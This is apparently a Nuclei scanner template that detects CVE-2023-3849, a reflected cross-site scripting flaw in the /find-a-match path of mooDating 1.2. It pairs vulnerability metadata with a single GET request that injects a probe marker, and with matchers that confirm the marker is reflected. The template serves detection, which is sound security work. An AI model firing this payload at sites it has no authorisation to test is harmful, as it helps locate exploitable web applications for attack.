id: CVE-2023-3849 info: name: mooDating 1.2 - Cross-site scripting author: r3Y3r53 severity: medium description: | A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. reference: - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2023-3849 - https://vuldb.com/?ctiid.235200 - https://vuldb.com/?id.235200 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-3849 cwe-id: CWE-79 epss-score: 0.00235 epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moodating tags: cve2023,cve,packetstorm,xss,unauth,moodating,moosocial http: - method: GET path: - '{{BaseURL}}/find-a-matchpksyk">s9a64?' matchers: - type: dsl dsl: - 'status_code == 404' - 'contains(content_type, "text/html")' - 'contains(body, ">s9a64") && contains(body, "mooDating")' condition: and # digest: 4b0a00483046022100976a429a0acadd41d7c73ccebbad61db7e7f7563ef6437758f5b07076b5218a6022100ec673a999416f67a8f70ed78449316a200fc7f2bcd4c6745c66108efd3ce5ea9:922c64590222798bb761d5b6d8e72950